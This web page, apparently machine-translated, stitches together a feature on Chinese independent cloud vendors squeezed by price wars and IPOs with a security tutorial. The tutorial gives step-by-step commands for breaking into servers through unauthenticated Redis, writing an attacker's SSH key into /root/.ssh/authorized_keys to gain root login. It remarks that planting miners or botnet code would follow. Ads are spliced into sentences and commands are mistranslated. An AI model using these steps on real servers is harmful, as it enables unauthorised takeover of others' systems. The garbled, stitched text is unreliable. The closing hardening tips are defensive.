身价暴跌的独立“云”厂商：城池失落、员工郁闷、高管敌视

如今，一批对这个行业启蒙发挥过重要作用的赛道先驱者，或许不得不退出舞台中央。 这个故事听起来很悲伤。 但这正是发生的事情。

”

作者 | 胡哲

编辑| 王亚峰

投资者有一个经典的灵魂拷问问题：“如果BAT做同样的事情你会怎么做？”

不过，这个问题对于早期To B领域的创业者来说并不困难。

在他们的互联网世界观里，巨头不会和他们正面交锋：不划算、不值得、吃力不讨好。

其次，遇佛杀佛的互联网巨头无法在这个碎片化的市场中获得大规模的利益，因此无法在短时间内向其烧起战火。

在此背景下，Ucloud、金山云、青云等独立云厂商因时差而纷纷开拓自己的蓝海。

悲剧在于，把蓝海变成红海并不需要一场残酷的战斗，只需要一个决定：一个让大公司提高To B战略优先级的决定。

随着流量红利逐渐耗尽，这个决定终于在2018年左右做出。

“明知没有利润，明知这是一场持久战，办公厅仍然坚持做，因为当时确实没有方向可以产生巨大的增长，而海外的AWS和Azure已经做得很好了。”对于他们来说。 树立榜样。”当各大互联网公司都落得如此无奈的下场时，这群嚣张的互联网大军却开始做一些比创业公司更丢脸、更边缘的事情。

“本以为巨头们会瞧不起他们这片荒地，没想到他们每个人都投入了10到20倍的人力来碾压他们。 这群人扛着锄头，用人海战术打败了Ucloud，金山云，青云是一群拉着牛车耕地的人。 先进的互联网公司来到云计算赛道后，其业务逻辑比这群初创公司更加原始和野蛮。”一位亲身经历过云计算王者之争的从业者感慨道。

“我们的商业世界观崩塌了，这是真正的降维攻击，不计成本、不计收益，用高炮打苍蝇。”

在大公司的挤压和仓促IPO的副作用下，这些没有互联网和电信巨头支持的独立云厂商陷入混乱，高管和员工也逐渐忘记了初衷。

老员工失去信心

独立云厂商正在经历过山车般的起伏，而今年，几乎没有什么起伏。

老员工的信仰感正因公司无法发展、无法适应新文化而慢慢被侵蚀。

杜德心情复杂。 他即将离开一家自己服务多年的独立云供应商，不得不进入一家参与度更高的更大公司。

“八九年前，云计算还是一个很少有人知道的领域，听起来很有前途。我和我的销售同事都是从外地毕业来到这里打拼的，我们大多数人都不是名校出身。所以，我能够加入一家初创公司，而且听说是一家未来有望上市的公司，所以就留下来了。当时公司也很扁平，文化也很友好的。” 杜德说：“至少在2018年之前，我是……不想离开，但现在我要考虑一家人吃饭的事情。”

杜德回忆，当时考虑到像阿里巴巴、腾讯这样的公司未来会大举挺进也不是没有可能，但当时创业的独立云厂商确实有一些技术优势。

“确实有一波红利期，特别是在前中期。独立云厂商有很多而且非常具体的优势。比如有的公司针对诸如此类的行业开展了磁盘技术、I/O接口加速方面的研究。 “通过一些有针对性的改编，我们获得了很多顶级客户，大家都是冲着技术优势而来的。”杜德说，所以当时“真的有一种感觉，我们正在领先，而且永远都会领先。”

然而，现在这个优势已经完全逆转了。 “光是阿里云就有一万多人的技术人员，还有达摩院这样的底层技术研发机构做支撑。但像我们这样的二线独立云厂商，技术人员加起来也只有几个。几百人中，大部分都是技术人员。”其中有一些是跟随项目的应用开发者，随着项目的增多，剩下来探索核心技术的HC已经不多了，这些核心骨干也很容易被大公司的高薪和无上限的投资所吸引。正在无情地碾压我们，我们除了不断后退，没有任何反击的能力。只是当时我们太年轻，我心里认为赢在起跑线上就赢在终点。

对于杜德来说，这份工作就像初恋：浪漫的开始，美妙的过程，以及不可预知的未来。

大公司对独立云厂商的侵蚀不仅来自外部，也在无意中腐蚀了企业内部的文化。

孙尚泽是行业领军人物，曾在大型制造商和独立云厂商担任过销售经理。 “我是一线业务人士，真实体验过阿里巴巴的铁军文化和华为的狼性文化。”

孙尚认为，在以上述两家公司为代表的2B销售体系中，人们不太能感受到所谓的互联网文化、极客文化，而是一种更传统、更原始的人能征服自然的过度信仰。

但当他加入早期的云计算初创公司后，他发现这些2B云计算公司的文化更加包容和自由。 还有不少骨干员工工作时间超过7、8年，他们从心底里认可这种文化。 。

但随着公司规模的扩大，这些公司逐渐想学习阿里巴巴中国供应链和华为铁三角的政企销售模式，纷纷高薪聘请高管。 但最终，他学会了所有的伎俩，把公司搞得一团糟。

强势的文化让很多一线员工感到疲惫。

“土错了，云计算初创企业的员工并没有那么苦毒、深仇大恨，他们普遍比较佛系，做事也很守纪律。但是，从外面吹进来的鸡血氛围，会让一些老员工员工觉得吃东西不被尊重。文化从来没有对错之分，只有合不合适。”

阿里巴巴中铁物资的一位高管曾表示，早期的中国供应商并没有被阿里巴巴的使命或情怀所吸引。 他们大多来自农村，有赚钱的欲望，有一点正能量。 申请者来自贫困家庭，有强烈的成功欲望，所以他们更容易把事情做好。 而且，2005年之前，供应团队中本科学历的人并不多。

总结了“北斗选人法”，有一个特点与之相对应，叫做“苦大仇大恨”：这些人一般没有特别好的家庭背景，他们希望改变自己的生活通过自己的努力。

经过阿里巴巴内部调查发现，在其他特征相同的情况下，具有“苦痛仇恨”的业务员的增长率和业绩确实很明显。

另一个品质是“需要”。 一个人知道自己想要什么吗？ 欲望是不是特别强烈？

“想要”分为三个层次：想要、真的想要、我一定想要。

“性是与生俱来的，是人心中的一种原始冲动。性欲不强的人在一线做生意可能会吃一些亏。”

华为业务人员的特点是一样的。 用任正非的话说，华为招人讲究八个字：有野心、身无分文。

曾有人戏称，阿里巴巴铁军和华为政企销售的特点可以概括为：我很穷，但我渴望成功。

但这些都是20多年前特殊时代创造出来的特殊2B商业文化。 经过不断的迭代，他们一直延续至今，没有改变成分。

如今的独立云厂商还没有经历过那个时代，当时很多员工还在小学阶段。 然而，为了更快地拓展产业线，企业在文化建设、招聘要求、薪酬结构、内部培训、奖金激励等方面贸然引进上一代文化。 他们也很容易相信那些降落在空中的外国僧侣，并且仍然在讲经中灌输“成功的学习经验”。 。

“当别人的文化强行渗透到我们身上时，我们的情绪是非常复杂的，保持不变。毕竟你的老板可能是这种文化的信徒，做出改变会违背你的初衷。老员工在这有点拉，挺累的，所以辞职的不在少数。很多部门经理只看问题的表面，以为学习别人的文化就能有能力。但这是只是最表面、最明显的东西。当年，华为在学习IBM时，应该更多地学习他们的内功，比如流程管理和人事财务管理，而不是贸然引进别人的文化。 曾担任云计算公司人力资源部负责人的李萌告诉雷锋网。

“云计算订单越大，就越需要跨部门甚至跨公司（ISV）的协同工作。最大的痛点是有时部门和合作伙伴打球，没有人愿意承担更多的责任。这些问题是不是开个宣誓大会，喊几句口号就能解决问题。2B领域有一条规则：开发新产品容易，交付难。鸡血文化只适合开发新产品。因此，首先要解决项目流程管理的问题，从流程的角度明确权责，对于跨部门的项目是非常有必要的，至于文化，则需要在当地采用而不是在所有职位上实施。”

华为历年管理咨询项目

不上市就是等死； 如果你公开，你就是在找死。

员工的信仰感正在消失，创始团队的信任感正在枯萎。

然而，IPO这个很多人心目中最年轻的事情，正在成为信仰和信任的敌人。

对于杜德，对于金山云员工来说，一直有一个信念在困难中支撑着他们，那就是上市。

然而，上市并没有让独立云厂商的境况变得更好，反而扭曲了他们的行为。

例如，上市要求企业有良好的财务数据，美国股市可以容忍损失。 科创板对于亏损的容忍度很低，但金山云和Ucloud即使想上市也都选择了流血。

不公开是不可能的。 2018年价格战打响后，独立云在一级市场融资将面临困难。 谁都看得出来，与巨头对抗是没有用的。 而且，云计算本质上是一个投入大量软硬件资源的产业。 规模越小，摊薄成本就越困难。 这个时候，唯一的生存之道就是从二级市场拿钱。

然而，对于金山等一些独立云厂商来说，上市意味着交出更好的财务数据并控制损失。 但一旦控制了亏损，就意味着失去市场份额； 相反，加速扩张、争取更多的市场份额就意味着更大的损失慈云数据自营海外云服务器,高稳定高性价比,支持弹性配置，从而导致股价下跌，同时也降低了筹集资金的能力。 这是一个始终难以兼得的选择。

“从某种意义上说，上市前后的一些行为其实是违反经济规律的。比如，我们必须跟进利润微薄的CDN业务，而不是花钱去开发利润更好的产品；比如，筹集资金建设规模更大的产品。” ，更昂贵的数据中心，这些是短期内无法支付的，”杜德说：“但资本市场希望看到并看好这些‘故事’，所以我们必须做一些疯狂的事情。

因此，有业内人士认为，如果一级市场还有钱可赚，独立云最好推迟上市，因为上市的价格会削弱其扩张速度和战略灵活性。

但随着ATH的成长阿里云服务器人员工资，这个“如果”已经变成了“没什么”。

比出血市场更深刻的问题是上市对员工心态的影响。

对于像杜德这样在公司工作十年的中层人士来说，唯一可能支撑他们熬过寒冬夜的信念就是，上市后的财务回报可能不足以实现财务自由，但他们或许可以为家人购买一套学区公寓。 ，为您的孩子选择更好的学校。

然而，独立云厂商的股价尤其脆弱。

金山云上市首日大涨40%，股价突破40亿美元，最高峰达到74美元/股。 公司市值超过150亿美元，但现在公司股价仅为每股5美元； Ucloud开盘时，开盘价达到72元，涨幅120.22%，市值近300亿元，目前股价22元/股； 青云科技于2021年3月16日在上交所科创板挂牌，发行价63.70元/股，仅用了11天。 跌破发行价。

对于规模较小的独立云厂商来说，股价缩水意味着员工对未来不再抱有积极信念，而对于金山云等规模较大的公司来说，则是一次猛烈的冲击。

“只要上市，就会有一批三年没工作的人。” 这是雷军和金山集团的一句名言。 不出意外，它也出现在金山云的上市过程中。 毕竟这家公司有150亿美元。 很聪明，但掌握这个最佳提现点的人却寥寥无几。

“影响最大的是上市，上市之前大家的目标都是一样的，就是让公司上市。但上市之后，人心都崩溃了。” 一位金山云前高管告诉雷锋网：“内部确实没有多少，老人们都在工作，有的人想立即套现过退休生活，甚至辞职去卖股票”还有一些人因为解禁而无法尽快解禁，却又不愿离开工作岗位，最终受到股价下跌的影响，财富缩水。、这部分人心怀大怨，无法专注业务；也有一些人原本准备与公司同进退，跟随到底，但股价大幅下跌，对公司影响很大。他们的信心。”

他还说：“以前，大家都兼职，月入几万块钱，多年以后，我们已经习惯了。上市后，有的人突然从穷到富，他们已经不知道他们的姓氏了，有的人注意力分散，有的人太粗心……反正很少有人能避免心态的变化，这给公司造成了一定的震动。

据雷锋网了解，无论是一些规模较小的独立云厂商，还是像金山云这样规模较大的公司，上市后都经历了一波密集的人事变动。 这不仅仅是因为有人想退休，更多的人事变动和调整的目的是为了对冲上市后的公众冲击。 这与内部的你死我活的斗争不一样，但却对公司的士气产生了深远的影响。 “以前大家都是一边打一边谋发展，现在我们不打了。” 不再有发展。”

商战恐惧症：价格战、资源战无力承受

“大家心态的变化、行动的变形，都可以追溯到这场权力完全不对等的商战的主要根源，是绝对权力面前恐慌的集中表现。”

中国的独立云厂商经历了两次巨大的灾难。 其中之一就是2018年和2019年头部云厂商对二线云厂商和独立云厂商发起的价格战和资源战。两年之内，基础公有云产品的价格变成了之前价格的四分之一。 一甚至六分之一。

价格战之前，根据IDC的公有云报告，金山云一度位居市场前三，并长期保持这一地位。 但2019年之后，已经让位于华为云，成为前五名之外的“其他”； 同样，2018年，UCloud占据中国公有云IaaS市场4.8%的份额，排名落后于阿里云、腾讯云、中国电信、亚马逊AWS、金山云，也成为“别人”。 就在前一年，Ucloud 还在前五名之列。

对于金山云和Ucloud这两家独立云厂商来说，跌出前五的成本是巨大的。

“中国市场已经形成事实上的多云格局，企业会在多云之间实时切换，选择价格最低的资源，而且这种切换会从半自动变成全自动，就像竞价排名一样， ”金山一位前云高管回忆道：“然而，无论有多少云选择，人们一般只在前三名或最多前五名之间进行选择。 更重要的是，前五名之外的厂商的云计算产品价格并不便宜。 它不会配备更多的资源，所以如果跌出前五，基本上就会退出公有云市场的主流，很难翻身。”

独立云厂商面临的选择是：跟随价格战还是不跟随？

他们基本上都选择了跟进，但跟进的后果却是悲惨的。

以Ucloud为例，2016年至2018年其营收增长非常迅速，但2019年之后被迫放缓。真实数据是，由于后续激进的价格战，2019年上半年净利润较2018年上半年大幅下降84.31%。

以2018年为分水岭，金山云2017年净亏损仅为7.14亿元。 但自2018年打响价格战以来，亏损迅速扩大至2018年10.06亿元、2019年11.11亿元。

“事实上，金山云的后续还是有选择性的，一些零利润或者负利润的项目被放弃了。这与​​金山云当时正在冲刺上市不无关系。但是对于游戏云和视频来说云、金山云的创业，你不能放弃，所以你坚决抵制。” 一位前金山员工回忆道：“这导致亏损扩大，市场份额也没有恢复。”

其实对于独立云厂商来说，最困难的不是打价格战，而是打价格战的同时还要打资源战。

“阿里巴巴、腾讯、华为（简称ATH）拿云计算订单，特别是政企客户的订单。他们往往不是单独卖云，而是捆绑成一个大计划。比如可以和地区合作，投资100亿，在一个地方建一个产业中心、智慧园区、智慧城市，然后把云计算捆绑进去，需要10年甚至20年才能慢慢收回成本，而金山云只投资1亿“非常困难，所以我干脆放弃了地级以上城市的业务，开始在县级城市工作。”这位前金山云高管说道。

除了与地方政府签署大型框架外，ATH还通过“资源换订单”的方式拥有更多资源与地方政府合作。 例如，目前移动支付的渗透率接近100%，而拥有微信支付和支付宝的腾讯、阿里巴巴，对于现金预算紧张的地方，可以免除或降低各类机构的支付通道费用。地方，并用这些来换取云计算的投资，地方政府可以直接增加云计算的投资。 收入资源很受关注，但很少有独立云厂商拥有这样的资源。

其中，金山云的情况其实是独立云厂商中最好的。 “金山云有两个支点，一个是小米和小米智能生态链使用的云，这两个都是金山云专有的。另一个是自有的WPS业务和云存储，这两个合计保持了50%的基础市场份额。” ，后来为了公开而被压缩。”

另一个原因是金山云有WPS作为队友。 WPS一般是政府采购的首选办公软件，所以金山云和WPS的适度捆绑也算是一种资源； 另一个重要的资源板块是小米。 小米每年出货数亿部手机，是极其重要的游戏发行渠道。 “所以在游戏云方面，虽然无法与腾讯竞争，但小米的核心资源还是可以作为话语权的。因此，金山云在游戏领域的定位更好。”上述人士告诉雷锋网。

独立云厂商很难拥有巨头投入的人力等资源。

“比如，一个数百万的CDN项目，利润可以说是薄如刀片，但总部位于深圳的巨头却可以派出十几名技术人员到这样的项目上，帮助其摆脱困境。这些人会待近一个月，住四星级酒店，自己付钱，还帮客户解决了一些IT问题，这种事情独立云厂商根本处理不了，但巨头们却毫不犹豫地这么做了。”杜德说道：“所以这种打法出现之后，2019年之后，我就意识到独立云基本没有希望了。”

未来黯淡？

此外，整个云计算市场的破解难度也越来越大。

尽管IDC等权威机构每年都会发布报告称云计算未来仍有巨大的增长空间，但对于一线的人们来说，感受却完全不同。

“我们觉得互联网客户是最好的客户，他们懂技术，有一定的技术能力，不需要付出太多额外的服务成本，也不需要教育。但这样的好客户确实是一天比一天少了。” “中国很少有不上云的互联网公司。”一位独立云厂商的部门负责人表示。

在杜德看来，被认为增量机会巨大的政企市场在2021年后将变得难以破解。

在中国云计算市场，无论是巨头还是独立云厂商，都存在着三类矛盾较为突出。

“2021年后首先凸显的矛盾是需求与预算的矛盾，互联网客户几乎被挖空阿里云服务器人员工资，政企客户在疫情压力下预算被严重削减，仍然要用有限的预算“在最前沿，比如抗疫、民生，IT投资非常紧张，所以一些项目不得不被砍掉。这对我们来说是可以理解的，但我们的生存空间正在日益被压缩。”一位前员工表示。独立云。 。

“第二类是传统企业，尤其是大型企业，服务用户非常非常困难。一方面，这些企业的业务流程非常稳定，没有太大的弹性增量，不会像互联网那样“一个商业模式一旦被验证，马上就会投入十倍、百倍的资源去跟进，这在传统企业是不会发生的。”杜德说。

他还表示：“另外，中国的需求，尤其是规模比较大的用户，是非常复杂的，他们有一种固有的甲方心态，必须低调地服务云厂商。有时候无论是一个订单，胜与败不在于你的技术方案好不好，而在于你拜访了多少人，以及你的服务态度是否足够谦虚。”

除了“获客难”之外，从另一个角度来看，是否要重点关注公有云以外的发展中市场也一直存在争议。

目前，AWS、微软等国际云厂商的云计算业务毛利率较高。 核心原因是公有云和标准化产品占比非常高。 因此，“构建高度通用的公有云”被认为是云计算的“正道”。

但中国的云业务很难有这样的架构。 有些客户天生对公有云缺乏安全感，而对混合云甚至私有云更感兴趣。 尽管云计算厂商多次教育客户，私有云和混合云的综合长期成本远高于使用公有云，但他们却很难被教育。 他们认为数据放在他们购买的服务器中并放置在可见的地方。 地方是最安全的，这个想法很难改变。

这部分市场因需求复杂、服务成本高，往往被主流厂商放弃。 为了生存，一些独立云成立了专门的项目公司来承接这些业务，这被视为“堕落”。

这是因为，对于云厂商来说，虽然这种碎片化需求的单价可以更高，但远远不值得增加的人力资源成本。 这不是云计算的主流。 如果一个云厂商做私有云，“那么我们可以认为，这家公司基本上已经认为自己在公有云市场没有机会了，所以才会做这样的事情。那就是把自己变成一个工程公司，把自己每一个订单。” ，为了生存，我可以做任何事情。”

独立云厂商的另一个客观问题是，由于采购规模远低于巨头客户，因此无论是带宽、服务器、机柜还是其他一些必要资源的采购成本都比较高，而上游企业也相对较高。对独立云厂商的“忽视”。

一位接受采访的云计算行业专家对此分析道——对于独立云厂商来说，天然的规模决定了他们有很多垂直赛道，但整体市场份额较低，无法依靠规模来稀释成本，也无法控制成本。 供应链成本。

例如，Ucloud去年通过定向增发筹集了近20亿元资金，用于Uker青浦数据项目并补充流动资金。 这对于Ucloud来说是罕见的大动作。

“但这笔钱对于腾讯、阿里巴巴这样的公司来说确实只是一个数字”，受访者告诉笔者：“Ucloud需要在二级市场筹集资金来建设新的数据中心，可以说是一个基石。”的整体情况。 但同样规模的投资对于腾讯和阿里来说根本算不了什么，所以越往前走，独立云厂商的服务成本就越高，竞争力就越弱。 至少目前还没有办法打破这个循环。”

从某种意义上来说，独立云厂商面临的压力与整个市场的竞争日趋激烈有关，但也与竞争更加成熟也不无关系。 在公有云领域，国际云厂商与国内云厂商的差距正在拉大。

《财经》分析文章指出，与海外巨头60%-70%的毛利率相比，国内云厂商的毛利率通常在30%左右。 扣除研发成本、硬件损耗成本和运营成本后，利润率通常只有个位数。 以阿里云为例，2021年前三季度总营收528.19亿元，调整后EBITA利润10.44亿元，利润率仅为1.98%。 其他云供应商普遍亏损。

巨头云厂商的超低毛利率，某种程度上是绞杀独立云厂商所付出的一次性代价。 从另一个角度来看，是因为海外竞争力较弱，不得不深耕国内市场，进一步挤压了市场。 这就压制了独立云厂商的生存空间。

在此背景下，金山云等企业被动卷入价格战。 但由于背后没有巨头输血，他们没有足够大的规模来摊薄技术投入的成本。 于是，“跟进则失血，不跟进则失地”。 ”已成为行业常态。

另一位举报人指出，早期的云计算市场不存在一些不规范的做法，比如挖矿，这曾经是云计算市场的灰色地带，但现在这种业务已经不可持续了。

在如此沉重的压力下，独立云厂商的裁员潮兴起。 一名疑似金山云员工的网友在论坛上发帖称：“2021年底，公司将裁员；2022年初，所有员工年终（奖励）将取消，恕不另行通知。 ” 而原因，只有部分员工通过单聊得知……他们的心都沉了下去。”

其他几家企业也纷纷传出裁员甚至创业团队解散的消息。 例如，有传言某独立云厂商核心创业团队出现裂痕，有合资核心成员离职的消息。

对此，一位资深人士表达了他对独立云未来的看法。 他表示：“像金山云、Ucloud这样的企业肯定不会消亡，而是会向不同的方向突破。比如向云+算力突破。现在的云资源不是和算力绑定的。未来，随着AI的云化和元界技术的发展，利用AI和元界理念做游戏和平台的公司对AI算力会有很大的需求，与云原生结合，如果一家公司能够提供AI+算力+ ”

如今，一批对这个行业启蒙发挥过重要作用的赛道先驱者或许不得不退出舞台中央。 这个故事听起来很悲伤。 但这正是发生的事情。

应受访者要求，文中杜德、孙尚、李萌、张忠、李强、王雷均为化名。 本文还有彩蛋没有放出来。 可联系《云内娟·五问》策划王亚峰，微信wangyafeng123456

结尾

《刑法》第285条【非法侵入计算机信息系统罪； 【非法获取计算机信息系统数据罪、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术等领域的计算机信息系统犯，判处处三年以下有期徒刑或者拘役。

1.什么是DDOS攻击？

分布式拒绝服务（DDoS）攻击是指不同地点的多个攻击者同时对一个或多个目标发起攻击，或者一个攻击者控制不同地点的多台机器，并利用这些机器同时攻击受害者。 由于攻击的起源分布在不同的地方，因此这种类型的攻击称为分布式拒绝服务攻击，并且可以有多个攻击者。

表现形式：

一种是流量攻击，主要是对网络带宽的攻击。 即大量的攻击报文导致网络带宽被阻塞，合法的网络报文被虚假攻击报文淹没而无法到达主机。

资源耗尽攻击的一种，主要是针对服务器主机的攻击。 通过大量的攻击数据包，导致主机内存耗尽或CPU被内核和应用程序占用，导致无法提供网络服务。

(1)被攻击主机上有大量等待的TCP连接。

(2)网络中充斥着大量源地址虚假的无用数据包。

（3）产生高流量的无用数据，造成网络拥塞，使受害主机无法与外界正常通信。

（4）利用受害主机提供的服务或传输协议的缺陷，高速重复发出特定的服务请求，使受害主机无法及时处理所有正常请求。

(5)严重时会导致系统崩溃。

2.您购买的Linux服务器是如何被WA挖矿的

背景：

这两年，很多人购买了云服务器，比如阿里云、华为云、腾讯云等。

出现的情况是云服务器上经常出现未知进程，CPU占用率超过90%。

部署的云服务器已被清空，只需支付BTB即可恢复

N种方式：

弱密码爆破入侵

webshel​​l文件提权入侵

redis端口入侵【最多】

最常见的现象：

未知进程CPU使用率过高

强制停止，过一段时间又自动出现

解决方案：

关闭外部监听端口

找到linux计划任务->清除位置任务

Redis禁止远程访问或设置复杂密码，并且不使用默认端口6379

重置

那么这种入侵的原理是什么呢？

所需知识：对称和非对称加密知识、中间人攻击知识、ssh登录流程知识

3.你知道SSH的原理吗？

SSH流程分析：

采用RSA非对称加密算法

(1) 远程主机接收用户的登录请求，并将其公钥发送给用户。

(2) 用户使用该公钥对登录密码进行加密并发回。

(3)远程主机使用自己的私钥解密登录密码。 如果密码正确，则允许用户登录。

注意：如果攻击者将自己插入到用户和远程主机之间（例如公共wifi区域），使用伪造的公钥获取用户的登录密码，然后使用该密码登录远程主机，那么SSH的安全机制就会丢失。 保存，这个风险就是著名的“中间人攻击”

当您第一次登录对方主机时，系统会显示以下提示：

“公钥指纹”是指公钥长度较长（这里采用RSA算法，长达1024位），很难比较，所以对其进行MD5计算，将其变成128位指纹。

在上面的示例中，它是 98:2e:d7:e0:de:9f:ac:67:28:c2:42:2d:37:16:58:4d

用户自己权衡后决定接受远程主机的公钥（远程主机贴出公钥指纹以便用户自己检查）

接受后，输入密码即可登录成功。 当远程主机的公钥被接受时，它将保存在文件 $HOME/.ssh/known_hosts 中。

下次连接到该主机时，系统会识别出其公钥已保存在本地，跳过警告部分，直接提示您输入密码。

4、SSH免密登录远程Linux云主机流程分析

使用密码登录每次都需要输入密码，非常麻烦。 SSH还提供公钥登录，可以省去输入密码的步骤。

*过程

*所谓“公钥登录”原理就是用户将自己的公钥存储在远程主机上。

*登录时，远程主机会发送一个随机字符串给用户，用户用自己的私钥加密后发回。

*远程主机使用预先存储的公钥进行解密。 如果成功，则证明该用户是值得信赖的，可以直接允许登录shell，无需密码。

*需要用户提供自己的公钥。 如果没有现成的，可以直接使用以下命令生成ssh-keygen

最多应用案例：Git代码仓库管理沟通

5、SSH免密登录远程Linux云主机实践

known_hosts 文件是什么

A 第一次通过 ssh 连接到 B。 B将公钥1（主机密钥）传递给A，A将公钥1存储在known_hosts文件中。

也就是说，SSH会将你访问过的每台计算机的公钥记录在~/.ssh/known_hosts中。

下次访问同一台计算机时，OpenSSH 会检查公钥。如果公钥不同，OpenSSH 会发出警告，以避免 DNS Hijack 等攻击。

主机文件内容格式：ip公钥字符串

修改此公钥字符串后，A通过ssh登录B时提示：主机密钥验证失败

原因：A的known_hosts文件中记录的B的公钥1与B在连接时传输的公钥2不匹配。

解决方案：

方法一：删除A的known_hosts文件中记录的B的公钥

方法二：清除本地主机配置 echo "" > ~/.ssh/known_hosts

方法三：修改配置文件，通过SSH登录时不通过known_hosts文件进行验证（安全性降低），需要重启机器。

6.SSH免密登录远程Linux云主机实践

本地生成密钥字符串：

ssh 密钥生成器

操作完成后云服务器防止爆破，会在$HOME/.ssh/目录下生成两个新文件。

id_rsa.pub 和 id_rsa，前者是你的公钥，后者是你的私钥

将公钥传输到远程主机并重新登录。 您不需要输入密码。

远程服务器：

远程主机登录后将用户的公钥保存在用户主目录的 $HOME/.ssh/authorized_keys 文件中。

公钥是一个字符串，只需将其附加到authorized_keys文件的末尾即可。

以上就是入侵的原理。核心：将公钥保存到$HOME/.ssh/authorized_keys目录下

7.阿里云ECS服务器安装Redis6-ru入侵环境

在两台服务器上安装Redis6

然后打开远程连接bind 0.0.0.0

不设置密码，或者直接默认为123456

守护进程运行 daemonize yes

指定启动的配置文件./redis-server ../redis.conf

- - - - - - - - - - - 开始 - - - - - - - - - - - - - - ----------

1. ssh-keygen 生成一对密钥

ssh 密钥生成器

2. 公钥生成攻击密钥值。 生成后，查看cat test.txt。

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > test.txt

3. 配置Key到Redis

./src/redis-cli -h192.168.243.129 连接被入侵的远程Redis

cat test.txt |redis-cli -h 192.168.243.129 -x set bar ．查看公钥内容，并通过管道命令将内容写入密钥栏。

4、登录Redis查看是否已经写入Redis。

redis-cli -h 192.168.243.129

得到酒吧

5、通过Redis保存机制替换系统文件

./src/redis.cli -h192.168.243.129

配置集目录 /root/.ssh

配置获取目录

配置集 dbfilename“authorized_keys”

节省

出口

6.成功将您的公钥写入/root/.ssh文件夹的authorized_keys中

7、登录远程主机查看效果：ssh -i id_rsa root@192.168.243.129

8、无密码正常登录192.168.243.129服务器

ru入侵进程，利用redis的持久化来操作文件权限

*Redis Config Set命令可以在不重启的情况下动态调整Redis服务器的配置。

*Redis Save命令执行同步保存操作云服务器防止爆破，将当前Redis实例的所有数据快照以RDB文件的形式保存到硬盘上。

*Redis支持两种持久化机制：RDB和AOF。

*RDB持久化是生成当前流程数据快照并保存到硬盘的过程。 触发RDB持久化的过程分为手动触发和自动触发。

*redis持久化配置慈云数据自营海外云服务器,高稳定高性价比,支持弹性配置，RDB文件保存在dir配置指定的目录下，文件名由dbfilename配置指定

*通过执行 config set dir {newDir} 和 config set dbfilename {newFileName} 在运行时动态执行

*下次运行时RDB文件会保存到新目录

入侵介绍到此结束。 您可以直接登录对方的服务器。 如果想要植入定时任务wa挖矿程序，肉鸡攻击等就会水到渠成。 。 。

但重点是：

《刑法》第285条【非法侵入计算机信息系统罪； 【非法获取计算机信息系统数据罪、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术等领域的计算机信息系统犯，判处处三年以下有期徒刑或者拘役。

八、如何防止云服务器被侵权并提升维权

1..禁止一些高风险命令

2、低权限运行应用服务

3.服务中添加复杂的密码验证

4.禁用外网访问并配置防火墙

5.保证authorized_keys文件的安全（只读，防止添加新的公钥等）

手机扫描二维码访问